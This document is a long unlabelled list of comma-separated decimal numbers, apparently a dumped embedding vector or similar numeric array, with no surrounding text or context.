0.0011368413688614964, -0.006355718709528446, -0.0051034907810389996, 0.01655513420701027, 0.003119220258668065, -0.014928372576832771, -0.021321922540664673, 0.005228335503488779, -0.028797458857297897, -0.016373543068766594, 0.0005509235197678208, 0.01532182190567255, -0.045488785952329636, -0.0029130377806723118, -0.020368564873933792, -0.02516561932861805, -0.01773548126220703, -0.00814137328416109, -0.01758415624499321, 0.004664643667638302, 0.0026841561775654554, -0.02751118317246437, -0.008368362672626972, 0.020323166623711586, -0.024530047550797462, -0.03531963750720024, -0.031839124858379364, -0.003699936205521226, -0.016963716596364975, 0.01634327694773674, 0.004373339936137199, -0.02254766970872879, 0.007906816899776459, 0.01203803438693285, -0.013869086280465126, -0.02575579471886158, -0.031264081597328186, 0.006423815619200468, -0.01684265397489071, -0.015488281846046448, -0.003295137546956539, 0.03123381733894348, -0.018946094438433647, 0.004630594979971647, -0.0006317886873148382, 0.03362477943301201, 0.003032207489013672, 0.005360746290534735, -0.0029243873432278633, -0.018991492688655853, -0.012764401733875275, -0.008557521738111973, -0.022789791226387024, -0.013906918466091156, 0.01050206832587719, -0.0018726671114563942, 0.008527255617082119, -0.016978848725557327, 0.013959882780909538, -0.005829858593642712, 0.036802638322114944, -0.014618153683841228, 0.011236002668738365, 0.017553890123963356, -0.006283838767558336, -0.01083498727530241, 0.0004208772152196616, 0.017236104235053062, 0.022517403587698936, -0.0007812237599864602, -0.010116185992956161, 0.0038380217738449574, 0.003325402969494462, -0.014292800799012184, -0.011773212812840939, -0.013392407447099686, -0.00024070392828434706, -0.047819215804338455, -0.02269899658858776, -0.029599489644169807, 0.01463328581303358, 0.03474459424614906, -0.03156673535704613, -0.0016854003770276904, 0.024166863411664963, 0.006908060982823372, -0.027253927662968636, 0.00889800675213337, -0.01744796149432659, -0.03522884100675583, -0.012794666923582554, 0.02436358854174614, 0.016812389716506004, -0.010744191706180573, 0.03226283937692642, -0.024030670523643494, -0.006518395151942968, -0.021987760439515114, -0.0034048494417220354, 0.01116790622472763, 0.01196993701159954, -0.024681374430656433, -0.012628207914531231, -0.03665131330490112, 0.03852776065468788, -0.023016782477498055, -0.004218230023980141, -0.00691184401512146, -0.02611897699534893, -0.006567575968801975, 0.0019804874900728464, -0.02729932591319084, 0.016358409076929092, 0.012393651530146599, 0.009677338413894176, 0.008958537131547928, -0.0044717020355165005, 0.01992971822619438, 0.009321721270680428, -0.01955140195786953, 0.009427649900317192, -0.0007519042119383812, 0.009942159987986088, 0.0007093436433933675, -0.03474459424614906, -0.010645829141139984, 0.028404010459780693, -0.003665887750685215, 0.013589131645858288, 0.027889499440789223, 0.00011704169446602464, 0.01693345047533512, -0.05072468891739845, 0.014603020623326302, 0.006102246697992086, -0.01685778796672821, -0.035501230508089066, -0.023077312856912613, -0.018492115661501884, -0.025634732097387314, 0.005788243841379881, 0.006344369146972895, 0.015049434266984463, -0.014527357183396816, 0.008640751242637634, 0.007755490019917488, -0.0067567345686256886, -0.00685509666800499, -0.028767194598913193, 0.0017468768637627363, 0.007146400399506092, 0.042583316564559937, -0.005152672063559294, -0.019869187846779823, -0.009609241969883442, 0.0022263932041823864, 0.012711437419056892, 0.02356155775487423, 0.020020514726638794, 0.00229070708155632, 0.0026463246904313564, -0.008943404071033001, 0.005515855737030506, 0.009790833108127117, 0.019506003707647324, -0.015427750535309315, 0.010797156020998955, 0.01706964522600174, 0.00458141416311264, 0.02568013034760952, -0.014171740040183067, 0.009268756955862045, -0.0008143264567479491, -0.01890069618821144, -0.031264081597328186, 0.02319837361574173, -0.01758415624499321, -0.01817432977259159, 0.024257659912109375, 0.03329186141490936, -0.0019246856682002544, -0.025695262476801872, -0.013785856775939465, 0.012053166516125202, 0.002907362999394536, -0.015367220155894756, -0.0032648721244186163, 0.008671016432344913, -0.02910011261701584, 0.0430372953414917, -0.012741702608764172, 0.026058446615934372, 0.010804722085595131, 0.020065912976861, -0.000819528300780803, 0.0012664147652685642, -0.019203349947929382, 0.01473164837807417, -0.006594058126211166, -0.009420082904398441, -0.014761913567781448, -0.0015085374470800161, -0.015405051410198212, -0.027390122413635254, -0.01991458609700203, -0.018068401142954826, 0.007778189145028591, 0.017674950882792473, 0.009533578529953957, -0.01233312115073204, -0.00616656057536602, 0.0052888658829033375, -0.0009959184098988771, 0.0023115144576877356, -0.010237246751785278, 0.009526011534035206, -0.027556581422686577, -0.014655984938144684, -0.02422739565372467, -0.009132562205195427, -0.008512123487889767, 0.006087114103138447, 0.0018896913388743997, -0.00912499614059925, 0.006938326172530651, -0.00904176663607359, -0.014421428553760052, 0.011909406632184982, 0.006571359466761351, -0.027813836932182312, -0.025861723348498344, -0.022850321605801582, -0.0222601480782032, 0.001971029443666339, -0.0035240191500633955, 0.021110065281391144, 0.07971887290477753, 0.003000050550326705, -0.0012058841530233622, -0.015223459340631962, 0.02378854714334011, 0.016313010826706886, -0.0015842007705941796, 0.01535208709537983, 0.00466842669993639, 0.004146350082010031, 0.012855198234319687, 0.01290816254913807, -0.0007159641827456653, 0.01590443029999733, 0.0034067409578710794, 0.011069543659687042, 0.01335457619279623, -0.0042863269336521626, 0.009351986460387707, 0.017841409891843796, -0.004649511072784662, 0.005648266989737749, -0.014512225054204464, 0.00005840262383571826, 0.021064668893814087, -0.0164038073271513, -0.021927230060100555, -0.012393651530146599, -0.011024145409464836, -0.0030132916290313005, 0.012386085465550423, -0.0037699248641729355, -0.03041665442287922, -0.022729260846972466, 0.0037037194706499577, -0.0015359653625637293, 0.038709353655576706, -0.03202071785926819, 0.000362238148227334, -0.02451491542160511, -0.019506003707647324, -0.002205585828050971, -0.017932206392288208, 0.001060232287272811, 0.0035353684797883034, -0.009760567918419838, -0.004573847632855177, 0.030749572440981865, -0.015874164178967476, 0.006488129496574402, -0.005391011480242014, -0.02253253571689129, 0.036802638322114944, 0.018476981669664383, 0.002693614223971963, 0.022411474958062172, 0.013816121965646744, 0.01977839134633541, 0.009571409784257412, 0.0057087973691523075, 0.006083331070840359, 0.016797257587313652, 0.0006781325209885836, -0.0040971687994897366, -0.012703871354460716, 0.01131166610866785, -0.01098631415516138, -0.005860124249011278, -0.01280979998409748, 0.04064633324742317, 0.015874164178967476, 0.021912097930908203, 0.01853751391172409, -0.0027692774310708046, 0.013331877067685127, 0.005356962792575359, 0.01947573758661747, 0.021246260032057762, -0.0049862125888466835, -0.00610981322824955, 0.009132562205195427, 0.010396139696240425, -0.020701484754681587, 0.034532736986875534, -0.012945993803441525, 0.027102600783109665, -0.02743551880121231, -0.011780778877437115, 0.026603223755955696, -0.01017671637237072, 0.017478227615356445, 0.012454181909561157, 0.012923294678330421, -0.002249092096462846, 0.013437805697321892, 0.028252683579921722, 0.007891683839261532, -0.01598009280860424, -0.025559069588780403, 0.03041665442287922, -0.009253623895347118, 0.008565087802708149, 0.0026841561775654554, -0.020444229245185852, -0.024908363819122314, 0.012189360335469246, 0.020852811634540558, 0.016101153567433357, -0.02766251005232334, 0.00374911748804152, -0.013399973511695862, -0.019748127087950706, 0.011644585058093071, -0.02378854714334011, 0.00008399810758419335, -0.009836231358349323, 0.019581666216254234, 0.010676094330847263, -0.007944648154079914, -0.026512427255511284, -0.02268386259675026, -0.011137640103697777, 0.01949087157845497, -0.009783267043530941, 0.014254969544708729, 0.008708847686648369, -0.022002892568707466, -0.0036110319197177887, 0.03377610445022583, 0.03771059960126877, 0.02029290236532688, 0.008799644187092781, -0.017886808142066002, 0.0004324631590861827, 0.0078462865203619, -0.001423416193574667, 0.03516831248998642, 0.021412719041109085, 0.003030315972864628, 0.0038550461176782846, -0.000009494860023551155, 0.032716818153858185, 0.01693345047533512, 0.01781114563345909, 0.014603020623326302, -0.008519689552485943, -0.006908060982823372, -0.0014915132196620107, 0.012900595553219318, 0.008300266228616238, 0.006665938533842564, -0.033957697451114655, 0.030658777803182602, 0.024711640551686287, -0.012560110539197922, 0.0015870381612330675, 0.022381210699677467, -0.021352188661694527, -0.0009018121636472642, 0.012340687215328217, -0.008126240223646164, -0.011833743192255497, 0.011727814562618732, -0.018068401142954826, 0.012461748905479908, 0.006779433228075504, -0.02508995682001114, -0.029644887894392014, -0.030749572440981865, -0.02159431204199791, 0.017750615254044533, 0.0035599591210484505, -0.00386828719638288, 0.007369607221335173, 0.027480917051434517, 0.03295894339680672, -0.0627702921628952, -0.019823789596557617, 0.03583414852619171, 0.00832296535372734, -0.01999024860560894, 0.017463093623518944, 0.00200507789850235, -0.0074566202238202095, 0.00472517404705286, -0.019384942948818207, -0.013884219340980053, -0.0055650370195508, -0.022139087319374084, 0.007203147746622562, 0.005012694746255875, 0.027556581422686577, 0.018582910299301147, -0.010782022960484028, 0.0006176018505357206, 0.0035618506371974945, 0.004974863026291132, -0.009768134914338589, -0.005867690313607454, -0.010449104011058807, 0.01853751391172409, -0.014905673451721668, 0.0029111462645232677, -0.0011557572288438678, -0.0033745840191841125, -0.038134314119815826, -0.016812389716506004, 0.005595302674919367, 0.00996485911309719, -0.0030057253316044807, -0.00014695235586259514, 0.0034672715701162815, 0.023470761254429817, -0.008958537131547928, -0.002846832387149334, -0.009427649900317192, -0.0073431250639259815, 0.002990592736750841, 0.0031967752147465944, -0.041766151785850525, -0.03311026841402054, 0.03289841115474701, 0.0023171892389655113, 0.0033726925030350685, 0.017251236364245415, 0.04715337976813316, 0.010426405817270279, -0.019506003707647324, -0.014655984938144684, -0.0022018025629222393, -0.05172344669699669, 0.0018319981172680855, -0.025059690698981285, 0.007123701274394989, 0.003427548334002495, -0.02260820008814335, 0.013142718933522701, -0.008587786927819252, 0.0038361302576959133, 0.008156505413353443, 0.010214547626674175, 0.009435215964913368, -0.03522884100675583, -0.003022749675437808, 0.005954703316092491, -0.0001695331302471459, 0.005659616086632013, -0.00503161083906889, -0.031021960079669952, 0.010630696080625057, 0.004573847632855177, 0.0010933349840342999, 0.017417695373296738, 0.0037131772842258215, -0.009389817714691162, 0.012968692928552628, -0.0018613176653161645, 0.014527357183396816, -0.0036488636396825314, -0.013278912752866745, 0.008111108094453812, 0.011591620743274689, 0.013626963831484318, 0.006635672878473997, 0.015147796832025051, -0.0005707851378247142, -0.01517806202173233, -0.0030681476928293705, 0.010880385525524616, -0.01029021106660366, 0.00685509666800499, -0.002877097809687257, -0.0027995428536087275, -0.022290414199233055, 0.012764401733875275, -0.010736624710261822, 0.00948818027973175, 0.01781114563345909, -0.015412618406116962, -0.004570064600557089, 0.003450247459113598, 0.020005380734801292, 0.010706359520554543, -0.02655782550573349, 0.008111108094453812, -0.0002319553605047986, -0.011213303543627262, -0.022638464346528053, -0.02838887646794319, -0.006064414978027344, 0.001727961003780365, -0.0007831153343431652, -0.011319232173264027, -0.009533578529953957, -0.0032837879844009876, 0.002233959501609206, -0.008958537131547928, 0.010766889899969101, 0.035864412784576416, 0.010940915904939175, -0.009768134914338589, 0.02327403612434864, -0.005527205299586058, -0.036499984562397, -0.041402969509363174, -0.0038890945725142956, -0.01156135555356741, -0.009473047219216824, -0.01809866540133953, 0.005447758827358484, -0.0065221781842410564, -0.013074621558189392, -0.015889296308159828, -0.01131166610866785, 0.015268857590854168, -0.01773548126220703, 0.0036469718907028437, -0.005886606406420469, 0.03238390013575554, -0.0008838421199470758, 0.028842857107520103, -0.02050475962460041, -0.023152975365519524, -0.00485001876950264, 0.0041690487414598465, 0.01649460382759571, -0.016313010826706886, 0.0022301762364804745, 0.012113697826862335, -0.0240760687738657, 0.03413929045200348, 0.01874937117099762, 0.012121263891458511, 0.010759323835372925, 0.009745435789227486, 0.0006313158082775772, 0.010993880219757557, -0.0019218482775613666, -0.0122196264564991, 0.0012588484678417444, -0.034986719489097595, 0.01722097210586071, -0.010101052932441235, -0.004793271422386169, 0.0006218578782863915, -0.022789791226387024, -0.013067055493593216, -0.015526113100349903, -0.011629451997578144, 0.01722097210586071, -0.010668528266251087, -0.01364966295659542, 0.009934593923389912, 0.005152672063559294, -0.0008564142044633627, 0.0009103243355639279, 0.009079597890377045, 0.013089754618704319, 0.010396139696240425, -0.03825537487864494, -0.010645829141139984, -0.02633083425462246, 0.01649460382759571, -0.022290414199233055, 0.026588089764118195, -0.016797257587313652, -0.009427649900317192, 0.01535208709537983, -0.005353179760277271, -0.004721391014754772, -0.02027777023613453, 0.006442731712013483, -0.01178834494203329, 0.02348589338362217, 0.02021723799407482, 0.012560110539197922, 0.028419142588973045, -0.009783267043530941, 0.007403655909001827, 0.04445976763963699, -0.007778189145028591, -0.016872920095920563, -0.0026992890052497387, -0.0025006725918501616, -0.0006105084321461618, -0.0031948836985975504, -0.01251471322029829, 0.02145811729133129, -0.0222601480782032, 0.006741601508110762, -0.004309026058763266, 0.004872717894613743, 0.01735716499388218, 0.008436460047960281, -0.014625719748437405, -0.0015936587005853653, -0.005258600693196058, -0.01554124616086483, -0.02457544580101967, -0.01657026633620262, 0.01156135555356741, 0.0020675002597272396, 0.01634327694773674, 0.012098564766347408, 0.021352188661694527, 0.03435114771127701, -0.013278912752866745, -0.02247200533747673, -0.0008252030820585787, 0.000454452820122242, 0.0160406231880188, 0.002211260609328747, 0.0031305698212236166, 0.020777147263288498, 0.012227192521095276, -0.006650805938988924, 0.01918821781873703, 0.04327941685914993, -0.02474190481007099, 0.008580219931900501, -0.005220768973231316, -0.00023100957332644612, -0.019869187846779823, -0.034623533487319946, -0.0003099831519648433, -0.023243771865963936, -0.0035656339023262262, -0.022366076707839966, -0.010381007567048073, -0.006291404832154512, -0.0003570362750906497, -0.00685509666800499, 0.010971181094646454, -0.002576336031779647, 0.042280662804841995, 0.020444229245185852, -0.009064465761184692, -0.005795810371637344, -0.02012644335627556, 0.014587887562811375, 0.004426304250955582, -0.010592864826321602, 0.0020126441959291697, -0.017130175605416298, -0.02955409325659275, -0.017992736771702766, -0.012098564766347408, 0.0006010505021549761, 0.0037018279545009136, -0.030325857922434807, 0.01050206832587719, 0.015488281846046448, 0.02144298516213894, 0.006276272237300873, -0.006049282383173704, -0.015919562429189682, 0.008360796608030796, 0.011273834854364395, -0.005129972938448191, 0.028661265969276428, 0.020837677642703056, 0.0054250601679086685, 0.010222114622592926, -0.001849022344686091, 0.014020413160324097, 0.016691328957676888, 0.02065608650445938, -0.001664593000896275, 0.006575142499059439, -0.012015335261821747, 0.006722685880959034, 0.010880385525524616, -0.019596800208091736, -0.01215152908116579, -0.0010072679724544287, -0.03531963750720024, -0.001573797082528472, -0.00780845433473587, -0.0021431634668260813, -0.011107374913990498, 0.007861418649554253, 0.013853954151272774, -0.006325453519821167, 0.0006502316682599485, 0.0005513964570127428, 0.031052226200699806, -0.02012644335627556, 0.012597942724823952, 0.0016267613973468542, 0.007524717133492231, -0.006264922674745321, -0.0017033704789355397, -0.0004454677982721478, 0.02094360627233982, 0.009412516839802265, 0.03816457837820053, 0.00424849521368742, -0.008444026112556458, -0.0013789639342576265, -0.00731664290651679, -0.012650907039642334, 0.001390313496813178, 0.0037699248641729355, 0.0012162878410890698, -0.000968490494415164, 0.005765544716268778, -0.0034710548352450132, -0.0072258468717336655, 0.013218381442129612, -0.00435820734128356, -0.0070215561427176, -0.007256112527102232, -0.006991290487349033, 0.012272590771317482, 0.0024136598221957684, -0.0009911895031109452, 0.0072485459968447685, 0.007176665589213371, 0.0027692774310708046, -0.0013259996194392443, -0.0009874063543975353, 0.0033575596753507853, -0.029084980487823486, 0.0023550207260996103, -0.003232715418562293, 0.004604112822562456, 0.007566331885755062, 0.024257659912109375, 0.0007121809758245945, -0.01817432977259159, 0.018507247790694237, 0.011742946691811085, -0.0004180398245807737, -0.013838821090757847, 0.0025895771104842424, -0.001757280551828444, 0.007698742672801018, 0.002332321833819151, -0.007210714276880026, -0.017629552632570267, -0.0022793575190007687, -0.025438006967306137, -0.005652050022035837, 0.010494502261281013, -0.0009647073457017541, 0.001789437490515411, 0.003656429937109351, -0.006370851304382086, -0.026936141774058342, 0.014103642664849758, -0.019294146448373795, -0.0068323975428938866, -0.011152773164212704, -0.018355920910835266, -0.010759323835372925, 0.014307933859527111, -0.007952215149998665, -0.022018026560544968, -0.003987457137554884, 0.008633184246718884, -0.011069543659687042, 0.013664795085787773, -0.0007140725501812994, 0.006802132353186607, -0.0038531546015292406, 0.015859032049775124, 0.005890389438718557, -0.0006298971129581332, 0.001938872504979372, -0.001393150887452066, 0.009783267043530941, 0.0006847530603408813, 0.006136295385658741, 0.003663996234536171, -0.003066255943849683, 0.015442883595824242, 0.007063170894980431, -0.01265847310423851, 0.015238592401146889, -0.007698742672801018, 0.020550157874822617, -0.0021847784519195557, 0.008088408969342709, -0.0034029576927423477, -0.034320879727602005, -0.012439049780368805, -0.007112352177500725, -0.001817811280488968, -0.01582876592874527, -0.005474240984767675, -0.0031892089173197746, 0.01582876592874527, -0.012893029488623142, 0.01517806202173233, -0.008625618182122707, 0.009056899696588516, -0.00683996407315135, -0.008595352992415428, 0.017538757994771004, 0.01647947169840336, -0.018113799393177032, -0.0014451694441959262, 0.012454181909561157, 0.01254497841000557, -0.026451896876096725, -0.005784460809081793, 0.04842452332377434, -0.012060733512043953, -0.027556581422686577, -0.014149040915071964, -0.003302703844383359, -0.003032207489013672, -0.014285234734416008, -0.0067340354435145855, -0.029281703755259514, -0.016434073448181152, -0.0016182492254301906, -0.004717607982456684, -0.0011027929140254855, -0.017054511234164238, 0.018855299800634384, 0.012189360335469246, -0.0069231935776770115, -0.012832499109208584, 0.004861368332058191, 0.0024401419796049595, -0.015283990651369095, -0.01685778796672821, -0.008595352992415428, 0.005334264133125544, -0.007138834334909916, -0.007165316492319107, -0.0009339691023342311, 0.005262383725494146, -0.031173286959528923, 0.017992736771702766, -0.018204594030976295, -0.015132663771510124, 0.010123752057552338, 0.0032837879844009876, 0.003945841919630766, 0.0010555032640695572, 0.00011290385737083852, -0.000817636726424098, 0.004479268565773964, 0.009510879404842854, 0.006926977075636387, 0.02487809956073761, 0.012174228206276894, -0.003976107574999332, 0.006491912994533777, 0.025195885449647903, 0.012212059460580349, -0.011894273571670055, 0.002459057839587331, -0.002534721279516816, -0.003393499879166484, 0.006306537427008152, -0.0012456073891371489, 0.01469381619244814, 0.019157951697707176, -0.005924437660723925, 0.005538554862141609, 0.012469314970076084, -0.005092141218483448, -0.006378417834639549, 0.0036602129694074392, 0.016313010826706886, 0.023258903995156288, 0.016797257587313652, 0.0001243715814780444, -0.0037604670505970716, -0.009094730950891972, 0.0010072679724544287, -0.023304302245378494, -0.007101002614945173, 0.03547096252441406, -0.006836181040853262, -0.001963463146239519, 0.017039379104971886, 0.0026255170814692974, -0.015813633799552917, -0.0019748127087950706, -0.02218448556959629, 0.010615563951432705, -0.020232371985912323, -0.005020261276513338, -0.021942362189292908, 0.015442883595824242, 0.006450297776609659, 0.008852608501911163, 0.0031362446025013924, -0.0024174430873245, -0.0019540050998330116, -0.006098463665693998, -0.02947842888534069, -0.0033178364392369986, 0.0032289321534335613, 0.000514037674292922, 0.004834886174649, -0.0010942807421088219, -0.000004525760232354514, -0.003631839295849204, 0.01050206832587719, -0.011069543659687042, -0.018855299800634384, 0.00915526133030653, -0.007297727279365063, -0.0036223814822733402, -0.0013193790800869465, 0.008459159173071384, -0.002211260609328747, 0.013294044882059097, -0.01772034913301468, -0.010449104011058807, -0.005996318068355322, 0.0033386440481990576, 0.002686047926545143, 0.02275952696800232, 0.009563843719661236, 0.00485001876950264, 0.0062195248901844025, 0.017387431114912033, -0.03326159343123436, 0.010282645002007484, -0.0019596798811107874, -0.01584389992058277, -0.016176817938685417, -0.02670915238559246, -0.007452836725860834, 0.02430305816233158, 0.029584357514977455, -0.0005674748681485653, 0.0043771229684352875, -0.000026127489036298357, 0.00044073883327655494, 0.018658574670553207, -0.015011602081358433, -0.007868985645473003, -0.0280862245708704, -0.005129972938448191, 0.010396139696240425, 0.006264922674745321, 0.00658649206161499, -0.00461167935281992, -0.00799004640430212, -0.008822343312203884, -0.0009462643647566438, 0.0013174875639379025, 0.016600532457232475, -0.00013725798635277897, 0.010744191706180573, -0.00799004640430212, 0.003919359762221575, 0.014111208729445934, 0.0016485145315527916, -0.0036167067009955645, -0.0057050143368542194, 0.0003099831519648433, 0.006571359466761351, 0.008277567103505135, -0.004460352472960949, -0.01613141968846321, 0.005440192762762308, 0.009435215964913368, -0.019717860966920853, -0.004645727574825287, -0.009601674973964691, -0.011606752872467041, -0.004940814804285765, -0.0010668528266251087, 0.0074377041310071945, 0.021503515541553497, 0.0019019866595044732, 0.00625357311218977, -0.0007632537162862718, 0.0006866446346975863, -0.023304302245378494, 0.0011983178555965424, 0.007562548853456974, 0.004335508216172457, 0.006983724422752857, -0.015041868202388287, -0.0156774390488863, 0.02042909525334835, -0.01469381619244814, -0.023016782477498055, -0.014860276132822037, 0.015147796832025051, -0.007138834334909916, 0.014466826803982258, 0.02109493315219879, -0.011061977595090866, -0.006121162325143814, 0.005784460809081793, 0.014315499924123287, -0.00933685339987278, 0.004691125825047493, 0.009480614215135574, -0.012053166516125202, 0.008852608501911163, -0.009109864011406898, -0.006821047980338335, -0.013074621558189392, -0.00647677993401885, 0.02487809956073761, 0.006276272237300873, -0.007539849728345871, 0.005035393871366978, -0.0072447629645466805, -0.012431483715772629, 0.014837577007710934, -0.019808657467365265, 0.0025857938453555107, -0.013218381442129612, -0.006594058126211166, 0.010070787742733955, 0.0038853115402162075, 0.011031711474061012, -0.010222114622592926, -0.01247688103467226, 0.02501429244875908, 0.0022301762364804745, -0.02319837361574173, 0.0023815028835088015, -0.0020996571984142065, -0.006045499350875616, 0.00459654675796628, -0.014966204762458801, 0.02661835588514805, -0.014943505637347698, -0.000257018837146461, -0.028116488829255104, -0.021685106679797173, -0.017493359744548798, -0.01817432977259159, -0.009072031825780869, -0.00835323054343462, 0.0034994285088032484, 0.02669401839375496, -0.023001648485660553, -0.01700911484658718, 0.00435820734128356, -0.00030690935091115534, 0.005201853346079588, 0.0030170748941600323, 0.01502673514187336, -0.009314154274761677, 0.0024363589473068714, -0.009132562205195427, 0.0002749888808466494, 0.00945034809410572, -0.004959730431437492, 0.00828513316810131, 0.01035830844193697, 0.011591620743274689, 0.01657026633620262, 0.0018546971259638667, -0.012643340975046158, 0.0032837879844009876, -0.0013155959313735366, -0.012461748905479908, 0.0034351146314293146, -0.03486565873026848, -0.01068366039544344, -0.0032270406372845173, -0.008784511126577854, -0.017932206392288208, -0.03326159343123436, -0.020852811634540558, -0.021397586911916733, 0.0036185982171446085, -0.0017639010911807418, 0.019521135836839676, 0.011773212812840939, 0.007119918242096901, -0.001060232287272811, 0.009019067510962486, -0.041251640766859055, -0.005235901568084955, 0.029675154015421867, 0.0024893232621252537, 0.01815919578075409, -0.021185729652643204, -0.0229865163564682, -0.0013137044152244925, -0.003815322881564498, 0.024984028190374374, -0.0036507551558315754, -0.02642163075506687, -0.009647073224186897, 0.027556581422686577, 0.006359501741826534, 0.026936141774058342, 0.0004960676305927336, -0.009594108909368515, -0.007010206580162048, -0.00010557397763477638, 0.014988903887569904, -0.003397282911464572, 0.019642198458313942, -0.011152773164212704, 0.017387431114912033, -0.004085819236934185, -0.0015690680593252182, 0.0005277516320347786, -0.0018414560472592711, -0.001362885581329465, -0.013142718933522701, 0.01598009280860424, -0.005262383725494146, 0.01693345047533512, 0.006329236552119255, -0.009246057830750942, 0.018128931522369385, -0.01502673514187336, -0.01584389992058277, -0.01455005630850792, -0.008618052117526531, 0.00040006980998441577, 0.002029668539762497, -0.013551300391554832, 0.014784612692892551, 0.0005731496494263411, -0.00516023812815547, -0.00019897088350262493, -0.00023632965167053044, 0.025801191106438637, 0.0029773516580462456, 0.011099808849394321, 0.01338484138250351, -0.0071539669297635555, 0.01744796149432659, 0.027828969061374664, 0.014254969544708729, 0.004078252706676722, -0.018144063651561737, -0.01720583811402321, 0.004021505359560251, 0.008928271941840649, -0.012317988090217113, -0.013392407447099686, -0.004793271422386169, 0.0009268756839446723, 0.0049143326468765736, -0.018144063651561737, 0.004592763260006905, 0.024635976180434227, 0.008451593108475208, -0.004989996086806059, 0.016963716596364975, -0.0032913542818278074, -0.006340586114674807, 0.0035353684797883034, -0.0042863269336521626, -0.01955140195786953, -0.02705720253288746, 0.01554124616086483, 0.01488297525793314, -0.01422470435500145, -0.015109964646399021, -0.009276323020458221, 0.02086794376373291, -0.007747923955321312, 0.01101657934486866, -0.011780778877437115, -0.01481487788259983, 0.003904227167367935, -0.0040517705492675304, -0.013127585873007774, 0.01641893945634365, -0.018567778170108795, -0.0024344671983271837, 0.00922335870563984, 0.03108249232172966, -0.001667430391535163, -0.01903689093887806, 0.005757978651672602, 0.010426405817270279, 0.003361342940479517, 0.0028506156522780657, -0.013392407447099686, -0.030038338154554367, -0.0010375332785770297, -0.008512123487889767, -0.01382368803024292, -0.03196018561720848, -0.010441537946462631, 0.012900595553219318, 0.0007310968358069658, 0.025135355070233345, 0.019203349947929382, 0.003688586875796318, -0.00581850903108716, 0.012189360335469246, 0.0005258600576780736, 0.01918821781873703, 0.016827521845698357, 0.0015577186131849885, -0.01050206832587719, 0.013770723715424538, -0.0140431122854352, -0.00003995969018433243, -0.0072258468717336655, 0.008784511126577854, -0.0006303700502030551, -0.026179509237408638, 0.021291658282279968, 0.009087164886295795, 0.003849371336400509, 0.0273598562926054, 0.023531291633844376, -0.016600532457232475, 0.008701281622052193, 0.010169150307774544, 0.009715170599520206, -0.0024628411047160625, 0.014943505637347698, 0.0014101751148700714, -0.01137976348400116, -0.019642198458313942, -0.019445473328232765, 0.017553890123963356, -0.013392407447099686, -0.0218969639390707, 0.00027758980286307633, -0.013536167331039906, 0.004172832239419222, 0.000545721675734967, -0.015707705169916153, 0.002118572825565934, -0.009957293048501015, -0.006423815619200468, 0.02056529000401497, 0.0030643644277006388, -0.01466355100274086, 0.004059337079524994, 0.0066583720035851, 0.019884319975972176, 0.02793489769101143, 0.018613176420331, -0.015034301206469536, -0.004240929149091244, 0.002358803991228342, -0.0014101751148700714, 0.017039379104971886, -0.0027371204923838377, 0.022366076707839966, 0.01379342284053564, 0.020474493503570557, -0.010275078937411308, -0.0037377679254859686, 0.005398578010499477, -0.015382353216409683, -0.009745435789227486, -0.0262703038752079, 0.0036866951268166304, 0.003953408449888229, 0.003054906614124775, 0.03734741359949112, -0.014777046628296375, 0.0012597942259162664, -0.0006606353563256562, 0.007683610077947378, 0.015427750535309315, -0.005247251130640507, -0.020913342013955116, 0.009495746344327927, -0.01832565665245056, 0.0065032620914280415, 0.007089653052389622, 0.007354474626481533, -0.016464337706565857, -0.017342032864689827, 0.013808555901050568, 0.012469314970076084, -0.00850455742329359, -0.0025006725918501616, 0.02050475962460041, -0.002334213349968195, -0.009541144594550133, 0.001087660202756524, 0.019959984347224236, -0.002729554194957018, 0.011092242784798145, 0.0023039481602609158, 0.00009298312215832993, -0.017266368493437767, 0.03108249232172966, 0.013899351470172405, -0.0007433920982293785, 0.008739113807678223, 0.0013562650419771671, -0.006552443373948336, -0.010365874506533146, -0.010713925585150719, -0.009836231358349323, -0.0063368030823767185, 0.006090897135436535, -0.008209469728171825, 0.0017837627092376351, -0.011508391238749027, 0.008451593108475208, 0.01976325921714306, -0.011584053747355938, 0.014913240447640419, 0.001790383248589933, 0.023395098745822906, -0.010638263076543808, 0.0035561760887503624, 0.03085550107061863, -0.0035278021823614836, 0.007172882556915283, -0.006908060982823372, -0.010486936196684837, -0.019218483939766884, -0.011266267858445644, 0.009745435789227486, -0.007172882556915283, -0.014406295493245125, -0.022350944578647614, -0.01649460382759571, -0.008474291302263737, -0.0010687443427741528, -0.0013789639342576265, -0.015382353216409683, 0.012408784590661526, -0.000726367870811373, 0.01035830844193697, -0.026527559384703636, -0.0013959882780909538, -0.0035675254184752703, 0.002487431513145566, -0.0028316997922956944, 0.01517806202173233, -0.03150620684027672, 0.0028846641071140766, -0.010494502261281013, -0.016676194965839386, 0.0037131772842258215, -0.0025914686266332865, -0.02472677268087864, 0.0320812463760376, -0.01575310342013836, -0.003983673639595509, 0.014020413160324097, 0.0033235112205147743, -0.008867740631103516, -0.0018017328111454844, 0.020807413384318352, -0.005837425123900175, -0.005372095853090286, 0.012620641849935055, -0.0024477082770317793, 0.01837105304002762, -0.02233581244945526, -0.008262434042990208, -0.005875256843864918, 0.019611932337284088, -0.010774456895887852, 0.011447859928011894, 0.008792078122496605, 0.00549315707758069, 0.01418687216937542, -0.023107577115297318, -0.0035240191500633955, -0.009299022145569324, 0.019369808956980705, -0.014073377475142479, -0.000011297775017737877, 0.006991290487349033, 0.003904227167367935, 0.025876855477690697, 0.005413710605353117, -0.006291404832154512, 0.01215152908116579, 0.02589198760688305, -0.012711437419056892, -0.033080004155635834, -0.024121467024087906, 0.004562498070299625, -0.014323065988719463, 0.010131318122148514, -0.007921949960291386, 0.020958740264177322, -0.009351986460387707, -0.005901739001274109, -0.018295390531420708, -0.008330531418323517, -0.0015671765431761742, -0.009548710659146309, 0.0015028626658022404, -0.016751859337091446, -0.0007594705675728619, -0.002003186382353306, -0.01557151135057211, -0.014686250127851963, 0.0031967752147465944, 0.007687393110245466, -0.01320324931293726, -0.0020012948662042618, 0.004902983084321022, 0.009367118589580059, -0.011894273571670055, -0.007974914275109768, 0.011916972696781158, 0.0034067409578710794, -0.0010772565146908164, 0.004259844776242971, -0.003177859354764223, -0.02518075332045555, -0.009435215964913368, -0.022381210699677467, 0.01499646995216608, -0.012673606164753437, -0.002063716994598508, 0.022381210699677467, -0.012272590771317482, 0.011553788557648659, -0.005432626232504845, -0.017387431114912033, 0.01072149258106947, 0.002669023582711816, -0.01758415624499321, 0.009692471474409103, -0.006654588971287012, -0.017644686624407768, 0.014603020623326302, -0.0057995934039354324, 0.01664593070745468, -0.0018859081901609898, -0.007157749962061644, 0.01415660697966814, 0.004706258419901133, -0.012136396020650864, -0.013944749720394611, 